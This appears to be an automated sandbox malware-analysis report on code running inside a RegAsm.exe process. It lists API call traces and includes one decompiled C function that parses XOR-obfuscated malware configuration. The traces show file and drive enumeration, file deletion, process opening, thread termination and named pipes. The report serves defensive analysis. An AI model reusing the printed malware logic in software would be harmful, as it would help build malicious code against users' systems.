Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FreeVirtual
String ID:
API String ID: 1263568516-0
Opcode ID: 2e59c045b8d06e368330c2569aa99627f3c83135fa78830b4845010cc4a0073a
Instruction ID: 19aaeea569a33f291d8de1da5938b9ac5836db27f4a1426a8fda024c0803d771
Opcode Fuzzy Hash: 2e59c045b8d06e368330c2569aa99627f3c83135fa78830b4845010cc4a0073a
Instruction Fuzzy Hash: 84D01730D00669EBCF20DBA5DC85E9EFB70BF19711F608224E661771A4C3301912CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 03F22ECF, Relevance: 28.7, APIs: 19, Instructions: 233stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

Part of subcall function 03F032FB: ExpandEnvironmentStringsW.KERNEL32(03F11864,00000000,00000000,00000001,00000000,00000000,?,03F11864,00000000,?,03F0AAC3,00000000), ref: 03F03312
Part of subcall function 03F032FB: ExpandEnvironmentStringsW.KERNEL32(03F11864,00000000,00000000,00000000), ref: 03F0332C

lstrlenW.KERNEL32(?,00000000,74E069A0,?,00000250,?,00000000), ref: 03F22F1B
lstrlenW.KERNEL32(?,?,00000000), ref: 03F22F27
memset.NTDLL ref: 03F22F6F
FindFirstFileW.KERNEL32(00000000,00000000), ref: 03F22F8A
lstrlenW.KERNEL32(0000002C), ref: 03F22FC2
lstrlenW.KERNEL32(?), ref: 03F22FCA
memset.NTDLL ref: 03F22FED
wcscpy.NTDLL ref: 03F22FFF
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 03F23025
RtlEnterCriticalSection.NTDLL(?), ref: 03F2305A

Part of subcall function 03F04CF5: RtlFreeHeap.NTDLL(00000000,00000000,03F0194B,00000000), ref: 03F04D01

RtlLeaveCriticalSection.NTDLL(?), ref: 03F23076
FindNextFileW.KERNEL32(?,00000000), ref: 03F2308F
WaitForSingleObject.KERNEL32(00000000), ref: 03F230A1
FindClose.KERNEL32(?), ref: 03F230B6
FindFirstFileW.KERNEL32(00000000,00000000), ref: 03F230CA
lstrlenW.KERNEL32(0000002C), ref: 03F230EC
FindNextFileW.KERNEL32(?,00000000), ref: 03F23162
WaitForSingleObject.KERNEL32(00000000), ref: 03F23174
FindClose.KERNEL32(?), ref: 03F2318F

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID:
API String ID: 2962561936-0
Opcode ID: 0f38c596eb30f447590b7b23cdbdbd48757273170bc339dd64b14ef503553217
Instruction ID: 1ab54dc91b273a1d3e34e1f073bf16dd1833e5aab32e8f45a7d702551e13a903
Opcode Fuzzy Hash: 0f38c596eb30f447590b7b23cdbdbd48757273170bc339dd64b14ef503553217
Instruction Fuzzy Hash: 0E816DB5904356EFD721EF25CC84A1BBBE9FF94304F08482EF985961A2D778D8148F62

Uniqueness

Uniqueness Score: -1.00%

Function 03F1F1EE, Relevance: 16.9, APIs: 11, Instructions: 376memoryCOMMON

Download Yara Rule

APIs

StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F224
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F256
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F288
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F2BA
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F2EC
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F31E
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F350
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F382
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F3B4
HeapFree.KERNEL32(00000000,00000000,?,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000), ref: 03F1F45B
StrToIntExA.SHLWAPI(00000000,00000000,00000000,00000001,00000000,74E04D40,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F1F486

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 4738e08ed38edf9faf8a670b73e98ce59a341e02d97a399b2b3b0c6b271d469e
Instruction ID: c0d68fa9dc7586ff8138bdf7cff37f9d0ccab3bd758193f69416a8bd1dafac97
Opcode Fuzzy Hash: 4738e08ed38edf9faf8a670b73e98ce59a341e02d97a399b2b3b0c6b271d469e
Instruction Fuzzy Hash: 6DC1C4B5B10316DBDB20FF75FCD4D6F77DCAF18650B184A25A80ACB218EA74D8618B60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1E4D5, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?,00000000,00000000,00000000,?,03F2C1E4,03F07294,03F2C1E4,00000000,?,?,03F14958), ref: 03F1E508
GetLastError.KERNEL32(?,03F2C1E4,03F07294,03F2C1E4,00000000,?,?,03F14958), ref: 03F1E516
NtSetInformationProcess.NTDLL ref: 03F1E570
GetProcAddress.KERNEL32(?,00000000), ref: 03F1E5AF
GetProcAddress.KERNEL32(?), ref: 03F1E5D0
TerminateThread.KERNEL32(?,00000000,03F14958,00000004,00000000), ref: 03F1E627
CloseHandle.KERNEL32(?), ref: 03F1E63D
CloseHandle.KERNEL32(?), ref: 03F1E663

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: 7dff22cc0345ef406520337903e4debd90ae09cb7432cfa0fcc816d1f5d59efe
Instruction ID: bc74bc386f9df44424894b22777bfe4a7bfa7272e36daa2c04a824df2df3a3f3
Opcode Fuzzy Hash: 7dff22cc0345ef406520337903e4debd90ae09cb7432cfa0fcc816d1f5d59efe
Instruction Fuzzy Hash: C941AF7151434AEFD720EF24E844A5BBBE9FBA8308F080A2DF855D2164D7B0D968CB52

Uniqueness

Uniqueness Score: -1.00%

Function 03F18409, Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 03F1843D
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 03F18449
RtlAllocateHeap.NTDLL(00000000,?), ref: 03F1845A
memset.NTDLL ref: 03F18477
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 03F18485
WaitForSingleObject.KERNEL32(00000000), ref: 03F18493
GetDriveTypeW.KERNEL32(?), ref: 03F184A1
lstrlenW.KERNEL32(?), ref: 03F184AD
wcscpy.NTDLL ref: 03F184BF
lstrlenW.KERNEL32(?), ref: 03F184D9
HeapFree.KERNEL32(00000000,?), ref: 03F184F2

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID:
API String ID: 3888849384-0
Opcode ID: efa0e38f58ff81d9b93572d4e95edce244551177256d39fdddeb9749bb6d2795
Instruction ID: af1dab526a587d4956a9adab27e2b906fbc04228cc4b3670c9039a7d8f144816
Opcode Fuzzy Hash: efa0e38f58ff81d9b93572d4e95edce244551177256d39fdddeb9749bb6d2795
Instruction Fuzzy Hash: DE314932800119FBDB21EBA5EC48CDFBBBDEF19360B108051F004E2051DB75AA55EBA0

Uniqueness

Uniqueness Score: -1.00%

Function 010A6B67, Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 225
memoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E010A6B67(int* __ecx) {
				int _v8;
				void* _v12;
				void* _v16;
				void* __esi;
				signed int _t28;
				signed int _t33;
				signed int _t39;
				char* _t45;
				char* _t46;
				char* _t47;
				char* _t48;
				char* _t49;
				char* _t50;
				void* _t51;
				void* _t52;
				intOrPtr _t53;
				signed int _t59;
				void* _t61;
				void* _t62;
				signed int _t64;
				signed int _t67;
				signed int _t71;
				signed int _t75;
				signed int _t79;
				signed int _t83;
				signed int _t87;
				void* _t92;
				intOrPtr _t109;

				_t93 = __ecx;
				_t28 =  *0x10aa2d0; // 0x69b25f44
				if(E010A5377( &_v8,  &_v12, _t28 ^ 0x889a0120) != 0 && _v12 >= 0x110) {
					 *0x10aa324 = _v8;
				}
				_t33 =  *0x10aa2d0; // 0x69b25f44
				if(E010A5377( &_v16,  &_v12, _t33 ^ 0x0159e6c7) == 0) {
					_v12 = 2;
					L57:
					return _v12;
				}
				_t39 =  *0x10aa2d0; // 0x69b25f44
				if(E010A5377( &_v12,  &_v8, _t39 ^ 0xe60382a5) == 0) {
					L55:
					HeapFree( *0x10aa290, 0, _v16);
					goto L57;
				} else {
					_t92 = _v12;
					if(_t92 == 0) {
						_t45 = 0;
					} else {
						_t87 =  *0x10aa2d0; // 0x69b25f44
						_t45 = E010A6B20(_t93, _t92, _t87 ^ 0x7895433b);
					}
					if(_t45 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t45, 0,  &_v8) != 0) {
							 *0x10aa298 = _v8;
						}
					}
					if(_t92 == 0) {
						_t46 = 0;
					} else {
						_t83 =  *0x10aa2d0; // 0x69b25f44
						_t46 = E010A6B20(_t93, _t92, _t83 ^ 0x219b08c7);
					}
					if(_t46 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t46, 0,  &_v8) != 0) {
							 *0x10aa29c = _v8;
						}
					}
					if(_t92 == 0) {
						_t47 = 0;
					} else {
						_t79 =  *0x10aa2d0; // 0x69b25f44
						_t47 = E010A6B20(_t93, _t92, _t79 ^ 0x31fc0661);
					}
					if(_t47 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t47, 0,  &_v8) != 0) {
							 *0x10aa2a0 = _v8;
						}
					}
					if(_t92 == 0) {
						_t48 = 0;
					} else {
						_t75 =  *0x10aa2d0; // 0x69b25f44
						_t48 = E010A6B20(_t93, _t92, _t75 ^ 0x0cd926ce);
					}
					if(_t48 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t48, 0,  &_v8) != 0) {
							 *0x10aa004 = _v8;
						}
					}
					if(_t92 == 0) {
						_t49 = 0;
					} else {
						_t71 =  *0x10aa2d0; // 0x69b25f44
						_t49 = E010A6B20(_t93, _t92, _t71 ^ 0x3cd8b2cb);
					}
					if(_t49 != 0) {
						_t93 =  &_v8;
						if(StrToIntExA(_t49, 0,  &_v8) != 0) {
							 *0x10aa02c = _v8;
						}
					}
					if(_t92 == 0) {
						_t50 = 0;
					} else {
						_t67 =  *0x10aa2d0; // 0x69b25f44
						_t50 = E010A6B20(_t93, _t92, _t67 ^ 0x2878b929);
					}
					if(_t50 == 0) {
						L41:
						 *0x10aa2a4 = 5;
						goto L42;
					} else {
						_t93 =  &_v8;
						if(StrToIntExA(_t50, 0,  &_v8) == 0 || _v8 == 0) {
							goto L41;
						} else {
							L42:
							if(_t92 == 0) {
								_t51 = 0;
							} else {
								_t64 =  *0x10aa2d0; // 0x69b25f44
								_t51 = E010A6B20(_t93, _t92, _t64 ^ 0x261a367a);
							}
							if(_t51 != 0) {
								_push(_t51);
								_t61 = 0x10;
								_t62 = E010A532C(_t61);
								if(_t62 != 0) {
									_push(_t62);
									E010A1A44();
								}
							}
							if(_t92 == 0) {
								_t52 = 0;
							} else {
								_t59 =  *0x10aa2d0; // 0x69b25f44
								_t52 = E010A6B20(_t93, _t92, _t59 ^ 0xb9d404b2);
							}
							if(_t52 != 0 && E010A532C(0, _t52) != 0) {
								_t109 =  *0x10aa37c; // 0x3409630
								E010A69CC(_t109 + 4, _t57);
							}
							_t53 =  *0x10aa2d4; // 0x235d5a8
							_t22 = _t53 + 0x10ab2d2; // 0x340887a
							_t23 = _t53 + 0x10ab7c4; // 0x6976612e
							 *0x10aa320 = _t22;
							 *0x10aa390 = _t23;
							HeapFree( *0x10aa290, 0, _t92);
							_v12 = 0;
							goto L55;
						}
					}
				}
			}

0x010a6b67
0x010a6b6a
0x010a6b8a
0x010a6b98
0x010a6b98
0x010a6b9d
0x010a6bb7
0x010a6dc4
0x010a6dcb
0x010a6dd2
0x010a6dd2
0x010a6bbd
0x010a6bd9
0x010a6db2
0x010a6dbc
0x00000000
0x010a6bdf
0x010a6bdf
0x010a6be4
0x010a6bfa
0x010a6be6
0x010a6be6
0x010a6bf3
0x010a6bf3
0x010a6c04
0x010a6c06
0x010a6c10
0x010a6c15
0x010a6c15
0x010a6c10
0x010a6c1c
0x010a6c32
0x010a6c1e
0x010a6c1e
0x010a6c2b
0x010a6c2b
0x010a6c36
0x010a6c38
0x010a6c42
0x010a6c47
0x010a6c47
0x010a6c42
0x010a6c4e
0x010a6c64
0x010a6c50
0x010a6c50
0x010a6c5d
0x010a6c5d
0x010a6c68
0x010a6c6a
0x010a6c74
0x010a6c79
0x010a6c79
0x010a6c74
0x010a6c80
0x010a6c96
0x010a6c82
0x010a6c82
0x010a6c8f
0x010a6c8f
0x010a6c9a
0x010a6c9c
0x010a6ca6
0x010a6cab
0x010a6cab
0x010a6ca6
0x010a6cb2
0x010a6cc8
0x010a6cb4
0x010a6cb4
0x010a6cc1
0x010a6cc1
0x010a6ccc
0x010a6cce
0x010a6cd8
0x010a6cdd
0x010a6cdd
0x010a6cd8
0x010a6ce4
0x010a6cfa
0x010a6ce6
0x010a6ce6
0x010a6cf3
0x010a6cf3
0x010a6cfe
0x010a6d11
0x010a6d11
0x00000000
0x010a6d00
0x010a6d00
0x010a6d0a
0x00000000
0x010a6d1b
0x010a6d1b
0x010a6d1d
0x010a6d33
0x010a6d1f
0x010a6d1f
0x010a6d2c
0x010a6d2c
0x010a6d37
0x010a6d39
0x010a6d3c
0x010a6d3d
0x010a6d44
0x010a6d46
0x010a6d47
0x010a6d47
0x010a6d44
0x010a6d4e
0x010a6d64
0x010a6d50
0x010a6d50
0x010a6d5d
0x010a6d5d
0x010a6d68
0x010a6d76
0x010a6d80
0x010a6d80
0x010a6d85
0x010a6d8b
0x010a6d98
0x010a6d9e
0x010a6da4
0x010a6da9
0x010a6daf
0x00000000
0x010a6daf
0x010a6d0a
0x010a6cfe

APIs

StrToIntExA.SHLWAPI(00000000,00000000,?,00000000,?,69B25F44,?,00000000,69B25F44,?,00000000,69B25F44,E8FA7DD7,010AA00C,7691C740), ref: 010A6C0C
StrToIntExA.SHLWAPI(00000000,00000000,?,00000000,?,69B25F44,?,00000000,69B25F44,?,00000000,69B25F44,E8FA7DD7,010AA00C,7691C740), ref: 010A6C3E
StrToIntExA.SHLWAPI(00000000,00000000,?,00000000,?,69B25F44,?,00000000,69B25F44,?,00000000,69B25F44,E8FA7DD7,010AA00C,7691C740), ref: 010A6C70
StrToIntExA.SHLWAPI(00000000,00000000,?,00000000,?,69B25F44,?,00000000,69B25F44,?,00000000,69B25F44,E8FA7DD7,010AA00C,7691C740), ref: 010A6CA2
StrToIntExA.SHLWAPI(00000000,00000000,?,00000000,?,69B25F44,?,00000000,69B25F44,?,00000000,69B25F44,E8FA7DD7,010AA00C,7691C740), ref: 010A6CD4
StrToIntExA.SHLWAPI(00000000,00000000,?,00000000,?,69B25F44,?,00000000,69B25F44,?,00000000,69B25F44,E8FA7DD7,010AA00C,7691C740), ref: 010A6D06
HeapFree.KERNEL32(00000000,00000000,00000000,?,69B25F44,?,00000000,69B25F44,?,00000000,69B25F44,E8FA7DD7,010AA00C,7691C740,?,00000000), ref: 010A6DA9
HeapFree.KERNEL32(00000000,?,00000000,?,69B25F44,?,00000000,69B25F44,?,00000000,69B25F44,E8FA7DD7,010AA00C,7691C740,?,00000000), ref: 010A6DBC

Strings

Ut, xrefs: 010A6DA9, 010A6DBC

Memory Dump Source

Source File: 00000008.00000002.523000768.00000000010A1000.00000020.00020000.sdmp, Offset: 010A0000, based on PE: true

Associated: 00000008.00000002.522964976.00000000010A0000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523086607.00000000010A9000.00000002.00020000.sdmp Download File
Associated: 00000008.00000002.523114678.00000000010AA000.00000004.00020000.sdmp Download File
Associated: 00000008.00000002.523146525.00000000010AC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_10a0000_RegAsm.jbxd

Similarity

API ID: FreeHeap
String ID: Ut
API String ID: 3298025750-8415677
Opcode ID: 8e95877a2a4fb0735c84256aa5bdf35c0356eb92da7c9aa04890a3374ff93f04
Instruction ID: 5b458d22b9fe721d3e9b14bc803e813c257b5e0f9fd979b8a22ede76fbdb6ce3
Opcode Fuzzy Hash: 8e95877a2a4fb0735c84256aa5bdf35c0356eb92da7c9aa04890a3374ff93f04
Instruction Fuzzy Hash: 43716071F10518EADB61EBFCC8889EF7BF9EB48700BE84865A581D7144EA77D940CB60

Uniqueness

Uniqueness Score: -1.00%

Function 03F1B9D4, Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 03F1EA7C: ExpandEnvironmentStringsW.KERNEL32(74B606E0,00000000,00000000,74B606E0,?,80000001,03F19D7E,?,74B606E0,?,?,?,03F0F54C,?), ref: 03F1EA8D
Part of subcall function 03F1EA7C: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,?,?,03F0F54C,?), ref: 03F1EAAA

FreeLibrary.KERNEL32(?), ref: 03F1BB0A

Part of subcall function 03F1F67F: lstrlenW.KERNEL32(?,00000000,?,?,?,03F1BA4F,?,?), ref: 03F1F68C
Part of subcall function 03F1F67F: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,03F1BA4F,?,?), ref: 03F1F6B5
Part of subcall function 03F1F67F: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 03F1F6D5
Part of subcall function 03F1F67F: lstrcpyW.KERNEL32(-00000002,?), ref: 03F1F6F0
Part of subcall function 03F1F67F: SetCurrentDirectoryW.KERNEL32(?,?,?,?,03F1BA4F,?,?), ref: 03F1F6FC
Part of subcall function 03F1F67F: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,03F1BA4F,?,?), ref: 03F1F6FF
Part of subcall function 03F1F67F: SetCurrentDirectoryW.KERNEL32(00000000,?,?,?,03F1BA4F,?,?), ref: 03F1F70B
Part of subcall function 03F1F67F: GetProcAddress.KERNEL32(00000000,?), ref: 03F1F728
Part of subcall function 03F1F67F: GetProcAddress.KERNEL32(00000000,?), ref: 03F1F742
Part of subcall function 03F1F67F: GetProcAddress.KERNEL32(00000000,?), ref: 03F1F758
Part of subcall function 03F1F67F: GetProcAddress.KERNEL32(00000000,?), ref: 03F1F76E
Part of subcall function 03F1F67F: GetProcAddress.KERNEL32(00000000,?), ref: 03F1F784
Part of subcall function 03F1F67F: GetProcAddress.KERNEL32(00000000,?), ref: 03F1F79A

FindFirstFileW.KERNEL32(?,?,?,?), ref: 03F1BA60
lstrlenW.KERNEL32(?), ref: 03F1BA7C
lstrlenW.KERNEL32(?), ref: 03F1BA94

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

lstrcpyW.KERNEL32(00000000,?), ref: 03F1BAAD
lstrcpyW.KERNEL32(00000002), ref: 03F1BAC2

Part of subcall function 03F16D09: lstrlenW.KERNEL32(00000000,00000000,74E48250,74E069A0,?,?,?,03F1BAD2,?,00000000,03F1B2A5), ref: 03F16D19
Part of subcall function 03F16D09: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,03F1BAD2,?,00000000,03F1B2A5), ref: 03F16D3B
Part of subcall function 03F16D09: lstrcpyW.KERNEL32(00000000,00000000), ref: 03F16D67
Part of subcall function 03F16D09: lstrcatW.KERNEL32(00000000,?), ref: 03F16D7A

FindNextFileW.KERNEL32(?,00000010), ref: 03F1BAEA
FindClose.KERNEL32(00000002), ref: 03F1BAF8

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
String ID:
API String ID: 1209511739-0
Opcode ID: ad7ff5566fe937c421b48eadc941ecee7a5e5f49e11ef9ca8c0e641510d13964
Instruction ID: 74b3c2695e655345b97e325b3b5bd1249f9b686492c1c24210e0c8d3b9c68470
Opcode Fuzzy Hash: ad7ff5566fe937c421b48eadc941ecee7a5e5f49e11ef9ca8c0e641510d13964
Instruction Fuzzy Hash: 2C417C7190830ADBCB11EF25EC44A6FBBE8FB98704F040929F984D2294DB35D915DBA2

Uniqueness

Uniqueness Score: -1.00%

Function 03F0E91D, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000), ref: 03F0E935

Part of subcall function 03F163A7: RtlAllocateHeap.NTDLL(00000000,00000001,03F018D4), ref: 03F163B3

FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 03F0E99E
lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 03F0E9C6
RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 03F0EA18
DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 03F0EA23
FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 03F0EA36

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 7fec201a1a2bd3bd6aa45f0a2ddf7c996ba099709f466b3e5d24e2dabf070c58
Instruction ID: bec053102a3f77b28a3eb083247b7e3b8cde7ac892736c7319937e73c55c4d68
Opcode Fuzzy Hash: 7fec201a1a2bd3bd6aa45f0a2ddf7c996ba099709f466b3e5d24e2dabf070c58
Instruction Fuzzy Hash: 66414A75D0060AEFDF11EFA8CD44AAEBBB8FF24304F144565E941F61A0DB748A50EB50

Uniqueness

Uniqueness Score: -1.00%

Function 03F1A241, Relevance: 7.9, APIs: 6, Instructions: 399COMMON

Download Yara Rule

APIs

Part of subcall function 03F20EBC: memset.NTDLL ref: 03F20EDC

Part of subcall function 03F20EBC: memset.NTDLL ref: 03F21010
Part of subcall function 03F20EBC: memset.NTDLL ref: 03F21025

memcpy.NTDLL(?,00008F12,0000011E), ref: 03F1A2C6
memset.NTDLL ref: 03F1A2FC
memset.NTDLL ref: 03F1A34A
memset.NTDLL ref: 03F1A3C9
memset.NTDLL ref: 03F1A438
memset.NTDLL ref: 03F1A508

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: memset$memcpy
String ID:
API String ID: 368790112-0
Opcode ID: 244dd1bb9e943eaa20a1edf20b6768f8a9b860298ac901fc2f097bc0fdf4b244
Instruction ID: b0c3afce5579b8309ebb4c89733d3c637c7f1dab549836bac9e8a2dcfad6c56f
Opcode Fuzzy Hash: 244dd1bb9e943eaa20a1edf20b6768f8a9b860298ac901fc2f097bc0fdf4b244
Instruction Fuzzy Hash: 2BF10231901B9ACFCF31CF68D9946EABBF8BF51300F1449ADC5E786681D232AA55CB10

Uniqueness

Uniqueness Score: -1.00%

Function 03F03F97, Relevance: 6.1, APIs: 4, Instructions: 111stringnativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 03F03FED
lstrlenW.KERNEL32(?), ref: 03F03FFB
NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 03F04026
lstrcpyW.KERNEL32(00000006,00000000), ref: 03F04053

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Query$lstrcpylstrlen
String ID:
API String ID: 3961825720-0
Opcode ID: c78aa0751788b4b3a3feacf8cca078aca486361419c9470a8235033fa5409c60
Instruction ID: 729cd6b3a9549203726670d4c65a07db1ff2db3e06132d5f2f591f028ff168c4
Opcode Fuzzy Hash: c78aa0751788b4b3a3feacf8cca078aca486361419c9470a8235033fa5409c60
Instruction Fuzzy Hash: B2413D71A0020AEFDF21DFA9C984AAEBBB8FF14314F144069FA05E61A0D775DA11AF50

Uniqueness

Uniqueness Score: -1.00%

Function 03F0483A, Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 03F0485C

Part of subcall function 03F0317C: NtAllocateVirtualMemory.NTDLL(03F04884,00000000,00000000,03F04884,00003000,00000040), ref: 03F031AD
Part of subcall function 03F0317C: RtlNtStatusToDosError.NTDLL(00000000), ref: 03F031B4
Part of subcall function 03F0317C: SetLastError.KERNEL32(00000000), ref: 03F031BB

GetLastError.KERNEL32(?,00000318,00000008), ref: 03F0496C

Part of subcall function 03F2389B: RtlNtStatusToDosError.NTDLL(00000000), ref: 03F238B3

memcpy.NTDLL(00000218,03F25070,00000100,?,00010003,00000FFF,?,00000318,00000008), ref: 03F048EB
RtlNtStatusToDosError.NTDLL(00000000), ref: 03F04945

Memory Dump Source

Source File: 00000008.00000002.526029883.0000000003F00000.00000040.00020000.sdmp, Offset: 03F00000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_3f00000_RegAsm.jbxd

Similarity

API ID: Error$Status$Last$AllocateMemoryVirtualmemcpymemset
String ID:
API String ID: 2966525677-0
Opcode ID: b0252bc4f70e2206f87245189af1e189c4d3adb1a809a0ef6c6df2fcb3b8796c
Instruction ID: c406d2d5253ae15c6314d8dd39a3effc4dd18ed5d3e709f94179195cdf76eee5
Opcode Fuzzy Hash: b0252bc4f70e2206f87245189af1e189c4d3adb1a809a0ef6c6df2fcb3b8796c
Instruction Fuzzy Hash: 61319F7190130AEBDB20DF69D984AAAB7B8EB08340F14457AE689E7290D730AE549F50

Uniqueness

Uniqueness Score: -1.00%

Function 03F1C557, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,03F2C1A8,03F2C144), ref: 03F1C57B
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,03F017CA,?), ref: 03F1C5C6

Part of subcall function 03F227B2: CreateThread.KERNELBASE(00000000,00000000,00000000,?,00000000,03F062B9), ref: 03F227C9
Part of subcall function 03F227B2: QueueUserAPC.KERNELBASE(?,00000000,03F1BD43,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F227DE
Part of subcall function 03F227B2: GetLastError.KERNEL32(00000000,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F227E9
Part of subcall function 03F227B2: TerminateThread.KERNEL32(00000000,00000000,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F227F3
Part of subcall function 03F227B2: CloseHandle.KERNEL32(00000000,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F227FA
Part of subcall function 03F227B2: SetLastError.KERNEL32(00000000,?,?,03F1BD43,00000000,00000000,?,?,00000000,03F21CF9), ref: 03F22803

